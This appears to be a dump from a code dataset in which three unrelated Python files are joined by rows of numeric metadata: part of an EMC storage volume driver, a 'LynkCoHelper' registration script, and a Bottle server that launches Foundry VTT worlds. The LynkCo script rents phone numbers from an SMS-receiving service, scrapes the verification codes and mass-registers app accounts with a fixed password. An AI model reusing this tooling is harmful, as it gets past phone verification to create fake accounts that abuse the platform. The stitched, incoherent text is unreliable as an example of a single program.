rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Delete Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def create_volume_from_pool(
self, conn, storageConfigService, volumeName,
poolInstanceName, volumeSize):
"""Create the volume in the specified pool.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service
:param volumeName: the volume name (String)
:param poolInstanceName: the pool instance name to create
the dummy volume in
:param volumeSize: volume size (String)
:returns: volumeDict - the volume dict
"""
rc, job = conn.InvokeMethod(
'CreateOrModifyElementFromStoragePool',
storageConfigService, ElementName=volumeName,
InPool=poolInstanceName,
ElementType=self.utils.get_num(THINPROVISIONING, '16'),
Size=self.utils.get_num(volumeSize, '64'),
EMCBindElements=False)
LOG.debug("Create Volume: %(volumename)s Return code: %(rc)lu"
% {'volumename': volumeName,
'rc': rc})
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Volume: %(volumeName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'volumeName': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
# Find the newly created volume
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
def create_and_get_storage_group(self, conn, controllerConfigService,
storageGroupName, volumeInstanceName):
"""Create a storage group and return it.
:param conn: the connection information to the ecom server
:param controllerConfigService: the controller configuration service
        :param storageGroupName: the storage group name (String)
:param volumeInstanceName: the volume instance name
:returns: foundStorageGroupInstanceName - instance name of the
default storage group
"""
rc, job = conn.InvokeMethod(
'CreateGroup', controllerConfigService, GroupName=storageGroupName,
Type=self.utils.get_num(STORAGEGROUPTYPE, '16'),
Members=[volumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Group: %(groupName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'groupName': storageGroupName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
foundStorageGroupInstanceName = self._find_new_storage_group(
conn, job, storageGroupName)
return foundStorageGroupInstanceName
def create_storage_group_no_members(
self, conn, controllerConfigService, groupName):
"""Create a new storage group that has no members.
        :param conn: the connection to the ecom server
:param controllerConfigService: the controller configuration service
:param groupName: the proposed group name
:returns: foundStorageGroupInstanceName - the instance Name of
the storage group
"""
rc, job = conn.InvokeMethod(
'CreateGroup', controllerConfigService, GroupName=groupName,
Type=self.utils.get_num(STORAGEGROUPTYPE, '16'),
DeleteWhenBecomesUnassociated=False)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Group: %(groupName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'groupName': groupName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
foundStorageGroupInstanceName = self._find_new_storage_group(
conn, job, groupName)
return foundStorageGroupInstanceName
def _find_new_storage_group(
            self, conn, maskingGroupDict, storageGroupName):
        """After creating a new storage group, find it and return it.
        :param conn: the connection to the ecom server
:param maskingGroupDict: the maskingGroupDict dict
:param storageGroupName: storage group name (String)
:returns: maskingGroupDict['MaskingGroup']
"""
foundStorageGroupInstanceName = None
if 'MaskingGroup' in maskingGroupDict:
foundStorageGroupInstanceName = maskingGroupDict['MaskingGroup']
return foundStorageGroupInstanceName
def get_volume_dict_from_job(self, conn, jobInstance):
"""Given the jobInstance determine the volume Instance.
:param conn: the ecom connection
:param jobInstance: the instance of a job
:returns: volumeDict - an instance of a volume
"""
associators = conn.Associators(
jobInstance,
ResultClass='EMC_StorageVolume')
volpath = associators[0].path
volumeDict = {}
volumeDict['classname'] = volpath.classname
keys = {}
keys['CreationClassName'] = volpath['CreationClassName']
keys['SystemName'] = volpath['SystemName']
keys['DeviceID'] = volpath['DeviceID']
keys['SystemCreationClassName'] = volpath['SystemCreationClassName']
volumeDict['keybindings'] = keys
return volumeDict
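    # Illustrative sketch (added for clarity, not from the original driver): the dict
    # returned above is keyed on the CIM path of the new volume; the concrete values
    # below are assumptions used only to show the shape of the result.
    #   {'classname': 'Symm_StorageVolume',
    #    'keybindings': {'CreationClassName': 'Symm_StorageVolume',
    #                    'SystemName': 'SYMMETRIX+000195900551',
    #                    'DeviceID': '00075',
    #                    'SystemCreationClassName': 'Symm_StorageSystem'}}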
def remove_device_from_storage_group(
self, conn, controllerConfigService, storageGroupInstanceName,
volumeInstanceName, volumeName):
"""Remove a volume from a storage group.
:param conn: the connection to the ecom server
:param controllerConfigService: the controller configuration service
:param storageGroupInstanceName: the instance name of the storage group
:param volumeInstanceName: the instance name of the volume
:param volumeName: the volume name (String)
:returns: rc - the return code of the job
"""
rc, jobDict = conn.InvokeMethod('RemoveMembers',
controllerConfigService,
MaskingGroup=storageGroupInstanceName,
Members=[volumeInstanceName])
if rc != 0L:
rc, errorDesc = self.utils.wait_for_job_complete(conn, jobDict)
if rc != 0L:
exceptionMessage = (_(
"Error removing volume %(vol)s. %(error)s")
% {'vol': volumeName, 'error': errorDesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def add_members_to_masking_group(
self, conn, controllerConfigService, storageGroupInstanceName,
            volumeInstanceName, volumeName):
        """Add a member to a masking group.
:param conn: the connection to the ecom server
:param controllerConfigService: the controller configuration service
:param storageGroupInstanceName: the instance name of the storage group
:param volumeInstanceName: the instance name of the volume
:param volumeName: the volume name (String)
"""
rc, job = conn.InvokeMethod(
'AddMembers', controllerConfigService,
MaskingGroup=storageGroupInstanceName,
Members=[volumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error mapping volume %(vol)s. %(error)s")
% {'vol': volumeName, 'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
def unbind_volume_from_storage_pool(
self, conn, storageConfigService, poolInstanceName,
volumeInstanceName, volumeName):
"""Unbind a volume from a pool and return the unbound volume.
:param conn: the connection information to the ecom server
:param storageConfigService: the storage configuration service
instance name
:param poolInstanceName: the pool instance name
:param volumeInstanceName: the volume instance name
:param volumeName: the volume name
:returns: unboundVolumeInstance - the unbound volume instance
"""
rc, job = conn.InvokeMethod(
'EMCUnBindElement',
storageConfigService,
InPool=poolInstanceName,
TheElement=volumeInstanceName)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error unbinding volume %(vol)s from pool. %(error)s")
% {'vol': volumeName, 'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def modify_composite_volume(
self, conn, elementCompositionService, theVolumeInstanceName,
inVolumeInstanceName):
"""Given a composite volume add a storage volume to it.
        :param conn: the connection to the ecom server
:param elementCompositionService: the element composition service
:param theVolumeInstanceName: the existing composite volume
:param inVolumeInstanceName: the volume you wish to add to the
composite volume
:returns: rc - return code
:returns: job - job
"""
rc, job = conn.InvokeMethod(
'CreateOrModifyCompositeElement',
elementCompositionService,
TheElement=theVolumeInstanceName,
InElements=[inVolumeInstanceName])
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error adding volume to composite volume. "
"Error is: %(error)s")
% {'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def create_composite_volume(
self, conn, elementCompositionService, volumeSize, volumeName,
poolInstanceName, compositeType, numMembers):
"""Create a new volume using the auto meta feature.
        :param conn: the connection to the ecom server
:param elementCompositionService: the element composition service
:param volumeSize: the size of the volume
:param volumeName: user friendly name
:param poolInstanceName: the pool to bind the composite volume to
:param compositeType: the proposed composite type of the volume
            e.g. striped/concatenated
:param numMembers: the number of meta members to make up the composite.
If it is 1 then a non composite is created
:returns: rc
:returns: errordesc
"""
newMembers = 2
LOG.debug(
"Parameters for CreateOrModifyCompositeElement: "
"elementCompositionService: %(elementCompositionService)s "
"provisioning: %(provisioning)lu "
"volumeSize: %(volumeSize)s "
"newMembers: %(newMembers)lu "
"poolInstanceName: %(poolInstanceName)s "
"compositeType: %(compositeType)lu "
"numMembers: %(numMembers)s "
% {'elementCompositionService': elementCompositionService,
'provisioning': THINPROVISIONINGCOMPOSITE,
'volumeSize': volumeSize,
'newMembers': newMembers,
'poolInstanceName': poolInstanceName,
'compositeType': compositeType,
'numMembers': numMembers})
rc, job = conn.InvokeMethod(
'CreateOrModifyCompositeElement', elementCompositionService,
ElementName=volumeName,
ElementType=self.utils.get_num(THINPROVISIONINGCOMPOSITE, '16'),
Size=self.utils.get_num(volumeSize, '64'),
ElementSource=self.utils.get_num(newMembers, '16'),
EMCInPools=[poolInstanceName],
CompositeType=self.utils.get_num(compositeType, '16'),
EMCNumberOfMembers=self.utils.get_num(numMembers, '32'))
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Volume: %(volumename)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'volumename': volumeName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
# Find the newly created volume
volumeDict = self.get_volume_dict_from_job(conn, job['Job'])
return volumeDict, rc
def create_new_composite_volume(
self, conn, elementCompositionService, compositeHeadInstanceName,
compositeMemberInstanceName, compositeType):
"""Creates a new composite volume.
Given a bound composite head and an unbound composite member
create a new composite volume.
        :param conn: the connection to the ecom server
:param elementCompositionService: the element composition service
:param compositeHeadInstanceName: the composite head. This can be bound
:param compositeMemberInstanceName: the composite member.
This must be unbound
        :param compositeType: the composite type, e.g. striped or concatenated
:returns: rc - return code
:returns: errordesc - descriptions of the error
"""
rc, job = conn.InvokeMethod(
'CreateOrModifyCompositeElement', elementCompositionService,
ElementType=self.utils.get_num('2', '16'),
InElements=(
[compositeHeadInstanceName, compositeMemberInstanceName]),
CompositeType=self.utils.get_num(compositeType, '16'))
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Creating new composite Volume Return code: %(rc)lu."
"Error: %(error)s")
% {'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def _migrate_volume(
self, conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName):
"""Migrate a volume to another pool.
:param conn: the connection to the ecom server
:param storageRelocationServiceInstanceName: the storage relocation
service
:param volumeInstanceName: the volume to be migrated
:param targetPoolInstanceName: the target pool to migrate the volume to
:returns: rc - return code
"""
rc, job = conn.InvokeMethod(
'RelocateStorageVolumesToStoragePool',
storageRelocationServiceInstanceName,
TheElements=[volumeInstanceName],
TargetPool=targetPoolInstanceName)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Migrating volume from one pool to another. "
"Return code: %(rc)lu. Error: %(error)s")
% {'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def migrate_volume_to_storage_pool(
self, conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName):
"""Given the storage system name, get the storage relocation service.
:param conn: the connection to the ecom server
:param storageRelocationServiceInstanceName: the storage relocation
service
:param volumeInstanceName: the volume to be migrated
:param targetPoolInstanceName: the target pool to migrate the
volume to.
:returns: rc
"""
LOG.debug(
"Volume instance name is %(volumeInstanceName)s. "
"Pool instance name is : %(targetPoolInstanceName)s. "
% {'volumeInstanceName': volumeInstanceName,
'targetPoolInstanceName': targetPoolInstanceName})
rc = -1
try:
rc = self._migrate_volume(
conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName)
except Exception as ex:
if 'source of a migration session' in six.text_type(ex):
try:
rc = self._terminate_migrate_session(
conn, volumeInstanceName)
except Exception as ex:
LOG.error(_LE("Exception: %s") % six.text_type(ex))
exceptionMessage = (_(
"Failed to terminate migrate session"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
try:
rc = self._migrate_volume(
conn, storageRelocationServiceInstanceName,
volumeInstanceName, targetPoolInstanceName)
except Exception as ex:
LOG.error(_LE("Exception: %s") % six.text_type(ex))
exceptionMessage = (_(
"Failed to migrate volume for the second time"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
else:
LOG.error(_LE("Exception: %s") % six.text_type(ex))
exceptionMessage = (_(
"Failed to migrate volume for the first time"))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def _terminate_migrate_session(self, conn, volumeInstanceName):
"""Given the volume instance terminate a migrate session.
:param conn: the connection to the ecom server
:param volumeInstanceName: the volume to be migrated
:returns: rc
"""
rc, job = conn.InvokeMethod(
'RequestStateChange', volumeInstanceName,
RequestedState=self.utils.get_num(32769, '16'))
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Terminating migrate session. "
"Return code: %(rc)lu. Error: %(error)s")
% {'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc
def create_element_replica(
self, conn, repServiceInstanceName, cloneName,
sourceName, sourceInstance, targetInstance):
"""Make SMI-S call to create replica for source element.
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param cloneName: replica name
:param sourceName: source volume name
:param sourceInstance: source volume instance
:param targetInstance: target volume instance
:returns: rc - return code
:returns: job - job object of the replica creation operation
"""
if targetInstance is None:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=self.utils.get_num(8, '16'),
SourceElement=sourceInstance.path)
else:
rc, job = conn.InvokeMethod(
'CreateElementReplica', repServiceInstanceName,
ElementName=cloneName,
SyncType=self.utils.get_num(8, '16'),
SourceElement=sourceInstance.path,
TargetElement=targetInstance.path)
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error Create Cloned Volume: "
"Volume: %(cloneName)s Source Volume:"
"%(sourceName)s. Return code: %(rc)lu. "
"Error: %(error)s")
% {'cloneName': cloneName,
'sourceName': sourceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
def delete_clone_relationship(
self, conn, repServiceInstanceName, syncInstanceName,
cloneName, sourceName):
"""Deletes the relationship between the clone and source volume.
Makes an SMI-S call to break clone relationship between the clone
volume and the source
:param conn: the connection to the ecom server
:param repServiceInstanceName: instance name of the replication service
:param syncInstanceName: instance name of the
SE_StorageSynchronized_SV_SV object
:param cloneName: replica name
:param sourceName: source volume name
        :returns: rc - return code
        :returns: job - job object of the relationship deletion operation
"""
'''
8/Detach - Delete the synchronization between two storage objects.
Treat the objects as independent after the synchronization is deleted.
'''
rc, job = conn.InvokeMethod(
'ModifyReplicaSynchronization', repServiceInstanceName,
Operation=self.utils.get_num(8, '16'),
Synchronization=syncInstanceName)
LOG.debug("Break clone relationship: Volume: %(cloneName)s "
"Source Volume: %(sourceName)s Return code: %(rc)lu"
% {'cloneName': cloneName,
'sourceName': sourceName,
'rc': rc})
if rc != 0L:
rc, errordesc = self.utils.wait_for_job_complete(conn, job)
if rc != 0L:
exceptionMessage = (_(
"Error break clone relationship: "
"Clone Volume: %(cloneName)s "
"Source Volume: %(sourceName)s. "
"Return code: %(rc)lu. Error: %(error)s")
% {'cloneName': cloneName,
'sourceName': sourceName,
'rc': rc,
'error': errordesc})
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(
data=exceptionMessage)
return rc, job
    def get_target_endpoints(self, conn, storageHardwareService, hardwareId):
        """Given the hardwareId, get the target endpoints.
:param conn: the connection to the ecom server
:param storageHardwareService: the storage HardwareId Service
:param hardwareId: the hardware Id
:returns: rc
:returns: targetendpoints
"""
rc, targetEndpoints = conn.InvokeMethod(
'EMCGetTargetEndpoints', storageHardwareService,
HardwareId=hardwareId)
if rc != 0L:
exceptionMessage = (_("Error finding Target WWNs."))
LOG.error(exceptionMessage)
raise exception.VolumeBackendAPIException(data=exceptionMessage)
return rc, targetEndpoints
| 42.731818 | 79 | 0.587987 | 2,464 | 28,203 | 6.657062 | 0.137175 | 0.01646 | 0.010608 | 0.031823 | 0.574529 | 0.532281 | 0.500701 | 0.458697 | 0.447357 | 0.427422 | 0 | 0.005087 | 0.337836 | 28,203 | 659 | 80 | 42.796662 | 0.873253 | 0.023863 | 0 | 0.585185 | 0 | 0 | 0.141538 | 0.023779 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.012346 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486d212547e00f7831ca70c40d4c968f71b4de71 | 4,575 | py | Python | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import threading
import time
import base64
from lynkco_app_request import lynkco_app_request
from com.uestcit.api.gateway.sdk.auth.aes import aes as AES
from sms_request import sms_request
import json
import sys
import os
import re
class lynco_regist_wrok(threading.Thread):
    """Run the registration task in a new thread."""
    def __init__(self, config):
        # Initialize the thread
        threading.Thread.__init__(self)
        # Cache the configuration
self.config = config
self.project_id = self.config['sms_platform']['project_id']
self.max_count = int(self.config['sms_platform']['count'])
self.sms_request = sms_request()
        # Cache the APPKEY (stored base64-encoded, so decode it once)
        self.app_key = base64.b64decode(self.config['api_geteway']['app_key']).decode('utf-8')
        # Cache the APPSECRET (stored base64-encoded, so decode it once)
        self.app_secret = base64.b64decode(self.config['api_geteway']['app_secret']).decode('utf-8')
        # Cache the AESKEY (stored base64-encoded twice, so decode it twice)
self.aes_key = base64.b64decode(base64.b64decode(self.config['aes_key']).decode('utf-8')).decode('utf-8')
self.AES = AES(self.aes_key)
self.lynkco_app_request = lynkco_app_request(self.app_key, self.app_secret)
    def run(self):
        """Entry point of the thread."""
        print ("Starting registration task " + time.strftime('%Y-%m-%d %H:%M:%S'))
self.token = self.get_token()
if('' == self.token):
return 0
phone_list = []
while len(phone_list) < self.max_count:
phone = self.regist()
if('' == phone):
continue
phone_list.append({ 'username': phone, 'password': 'a123456789' })
with open(sys.path[0] + '/phone_list_' + time.strftime('%Y%m%d%H%M%S') + '.json', 'w') as json_file:
json_file.write(json.dumps(phone_list,ensure_ascii = False))
        print ("Registration task finished " + time.strftime('%Y-%m-%d %H:%M:%S'))
    def get_token(self):
        """Log in to the SMS platform and obtain a token."""
sms_username = self.config['sms_platform']['username']
sms_password = self.config['sms_platform']['password']
context = self.sms_request.login(sms_username, sms_password)
array = context.split('|')
if(int(array[0]) != 1):
            print("SMS account login failed: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
token = array[1]
        print("SMS account login succeeded, token: " + token + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return token
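    # Illustrative note (an assumption inferred from the parsing above, not documented
    # in the original source): the SMS platform appears to reply in a "status|payload"
    # form, e.g. "1|<token>" on success or "0|<error message>" on failure, which is why
    # array[0] is compared against 1 before array[1] is used.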
    def regist(self):
        """Registration flow on the app side."""
        # Get a phone number
context = self.sms_request.get_phone(self.token, self.project_id)
array = context.split('|')
if(int(array[0]) != 1):
            print("SMS account failed to get a phone number: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
phone = array[1]
        # Send the registration SMS
response = self.lynkco_app_request.get_vcode_by_regist(phone)
if response['code'] != 'success':
            print("Failed to send the registration SMS: " + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
        # Try up to 10 times to fetch the SMS content, waiting 3 seconds after each failure
vcode = ''
        fail_count = 0
while fail_count < 10:
context = self.sms_request.get_phone_msg(self.token, self.project_id, phone)
array = context.split('|')
if(int(array[0]) != 1):
                print("SMS account failed to fetch the verification code: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
fail_count += 1
time.sleep(3)
else:
context = array[1]
                # Extract the verification code with a regex
pattern = re.compile(r'\d{6}')
result = pattern.findall(context)
if(len(result) != 1):
                    print("SMS account failed to parse the verification code: " + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
else:
vcode = result[0]
                    print("SMS account fetched the verification code: " + vcode + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
break
if('' == vcode):
return ''
        # Submit the registration
password = self.AES.encrypt('a123456789')
response = self.lynkco_app_request.regist(phone, password, vcode)
if response['code'] != 'success':
            print("Registration API call failed: " + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
        # Try logging in once
response = self.lynkco_app_request.login(phone, password)
if response['code'] != 'success':
            print("Login attempt failed: " + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return phone
return phone | 39.782609 | 113 | 0.551257 | 535 | 4,575 | 4.571963 | 0.250467 | 0.058872 | 0.063778 | 0.068684 | 0.32175 | 0.237531 | 0.213818 | 0.182747 | 0.153312 | 0.091169 | 0 | 0.022936 | 0.285246 | 4,575 | 115 | 114 | 39.782609 | 0.725076 | 0.055956 | 0 | 0.202247 | 0 | 0 | 0.136427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0.067416 | 0.11236 | 0 | 0.269663 | 0.123596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4875786274d1dcdef100393c55e236d7510c92a2 | 10,457 | py | Python | Foundry_Manager_v2.py | MrVauxs/Foundry-Selection-Menu | 13f9164595c3c11fe01e5d44cd35bcc79b6a34df | [
"MIT"
] | 5 | 2020-09-26T10:16:17.000Z | 2022-01-06T14:31:54.000Z | Foundry_Manager_v2.py | MrVauxs/Foundry-Selection-Menu | 13f9164595c3c11fe01e5d44cd35bcc79b6a34df | [
"MIT"
] | null | null | null | Foundry_Manager_v2.py | MrVauxs/Foundry-Selection-Menu | 13f9164595c3c11fe01e5d44cd35bcc79b6a34df | [
"MIT"
] | 1 | 2020-09-07T23:36:17.000Z | 2020-09-07T23:36:17.000Z | import requests
from bottle import route, run, template,ServerAdapter,redirect
import subprocess
from html.parser import HTMLParser
import threading
import time
ssl_cert=None #XYZ - 'fullchain.pem'
ssl_key=None #XYZ - 'privkey.pem'
world_mapping={"URL_Path":["world-folder","Name To Be Shown"], "URL_Path2":["world-folder-2","Name To Be Shown Two: Electric Boogaloo"]} #XYZ - Repeatable until the HTML page doesn't handle it.
foundry_base="http://blank.com" #XYZ
foundry_port=30000 #XYZ
foundry_url=foundry_base+":"+str(foundry_port)
foundry_directory=r"C:\Program Files\FoundryVTT" #XYZ - The directory has to point to /resources/app
idle_logout=300 #XYZ- Seconds - time to shut down foundry if at login screen and 0 users
##Populate this automatically from module configuration, can probably get pictures etc but who has time?
class SSLWrapper(ServerAdapter):
def __init__(self, ssl_certfile = None, ssl_keyfile = None, host='0.0.0.0', port=8080):
self._ssl_certfile = ssl_certfile
self._ssl_keyfile = ssl_keyfile
super().__init__(host, port)
def run(self, handler):
from cheroot.ssl.builtin import BuiltinSSLAdapter
from cheroot import wsgi
server = wsgi.Server((self.host, self.port), handler)
self.srv = server
        if self._ssl_certfile is not None and self._ssl_keyfile is not None:
server.ssl_adapter = BuiltinSSLAdapter(self._ssl_certfile, self._ssl_keyfile)
try:
server.start()
finally:
server.stop()
def shutdown(self):
self.srv.stop()
class AwfulScrape_nPlayers(HTMLParser):
#This is why javascript was invented
def __init__(self):
super().__init__()
self.in_label=False #We are searching for a "Current Players:" label
self.previous_label_players=False #If we found it, grab the first input field
self.nPlayers=None #If nothing is found crash
def handle_starttag(self, tag, attrs):
if tag == "label":
self.in_label=True
if (tag == "input") and self.previous_label_players:
self.nPlayers=int(dict(attrs)["value"])
self.previous_label_players=False
def handle_endtag(self, tag):
if tag == "label":
self.in_label=False
if tag == "header":
self.in_header=False
def handle_data(self, data):
if self.in_label:
if "Current Players" in data:
self.previous_label_players=True
else:
self.previous_label_players=False
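# Illustrative note (assumed markup, not copied from an actual Foundry page): the parser
# above expects the /join page to contain something along the lines of
#   <label>Current Players:</label> <input value="3" ...>
# so nPlayers is taken from the first <input> that follows a "Current Players" label.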
## A bunch of threading stuff
class monitorPlayers(object):
def __init__(self, foundry_proccess):
self.foundry_proccess = foundry_proccess
thread = threading.Thread(target=self.run, args=())
thread.daemon = False
thread.start()
def run(self):
#Keep checking number of players
#If it's been 0 for 5 minutes, return to setup
zero_players=False
while True:
n_players=get_logged_in_players(timeout=30.) #Returns "None" if in setup etc so it's safe
if (n_players == 0) and zero_players:
self.foundry_proccess.send_signal(2)
self.foundry_proccess.send_signal(2) ##I think I need to send this twice?
self.foundry_proccess.wait()
break
time.sleep(idle_logout) #Wait five minutes
if n_players == 0:
zero_players=True
else:
zero_players=False
server.start()
class runServer(object):
def __init__(self):
self.server=SSLWrapper(ssl_certfile = ssl_cert, ssl_keyfile = ssl_key,port=foundry_port)
thread = threading.Thread(target=self.run, args=([self.server]))
thread.daemon = False
thread.start()
def run(self,server):
        run(server=server) ##This isn't a cruel practical joke - the second run refers to bottle.run (I'll remove the ugliness in the future)
class bottleManager: #this is basically just a global variable
def __init__(self):
self.bottle_server=runServer()
def shutdown(self):
self.bottle_server.server.shutdown()
self.bottle_server = None
def start(self):
self.bottle_server=runServer()
class startFoundryWorld(object):
def __init__(self, world):
self.world = world
thread = threading.Thread(target=self.run, args=([world]))
thread.daemon = False
thread.start()
def run(self,world):
server.shutdown()
        process_obj= subprocess.Popen(["node","main.js","--port=30000", r"--dataPath=C:\Users\XYZ\AppData\Local\FoundryVTT\Data","--world=%WORLD%".replace("%WORLD%",world)],cwd=foundry_directory) #XYZ - The --dataPath MUST direct to the FoundryVTT data folder (where worlds reside)
import time
time.sleep(12)
monitorPlayers(process_obj)
def get_logged_in_players(timeout=0.1):
r=requests.get(foundry_url+"/join",timeout=timeout)
par=AwfulScrape_nPlayers()
par.feed(r.text)
return par.nPlayers
def _get_world_url(item):
return "<p> > <a href='/"+item[0]+"' >" + item[1][1]+"</a> </p>"
@route('/')
@route('/<world>')
def index(world=None):
if (world == "join") or (world is None):
return """<!DOCTYPE html>
<html>
<title>Foundry World Select</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Signika">
<style>
body,h1 {font-family: "Signika", sans-serif}
body, html {height: 100%;
background-color: #3f403f;}
.bgimg {
min-height: 100%;
background-position: center;
background-size: cover;
}
</style>
<body>
<div class="bgimg w3-display-container w3-animate-opacity w3-text-white">
<div class="w3-display-topleft w3-padding-large w3-xlarge">
Welcome to Dlivitz & Vauxs Foundry Selection Screen!
</div>
<div class="w3-display-middle">
<h1 class="w3-jumbo w3-animate-top"> <strong> """+"".join([_get_world_url(x) for x in world_mapping.items()]) +""" </strong></h1>
<hr class="w3-border-grey" style="margin:auto;width:40%">
<p class="w3-large w3-center">This will start your selected world and you will be able to login.</p>
</div>
</div>
</body>
</html>
"""
requested_world_path,requested_world = world_mapping.get(world,[None,None])
if requested_world is None:
return template('<h1>Cannot find world <b> {{world}} </b></h1>',world=world)
startFoundryWorld(requested_world_path)
return """<!DOCTYPE html>
<html>
<title>Foundry World Select</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Signika">
<style>
body,h1 {font-family: "Signika", sans-serif}
body, html {height: 100%;
background-color: #3f403f;}
.bgimg {
min-height: 100%;
background-position: center;
background-size: cover;
}
@keyframes blink {
/**
* At the start of the animation the dot
* has an opacity of .2
*/
0% {
opacity: .2;
}
/**
* At 20% the dot is fully visible and
* then fades out slowly
*/
20% {
opacity: 1;
}
/**
* Until it reaches an opacity of .2 and
* the animation can start again
*/
100% {
opacity: .2;
}
}
.saving span {
/**
* Use the blink animation, which is defined above
*/
animation-name: blink;
/**
* The animation should take 1.4 seconds
*/
animation-duration: 1.4s;
/**
* It will repeat itself forever
*/
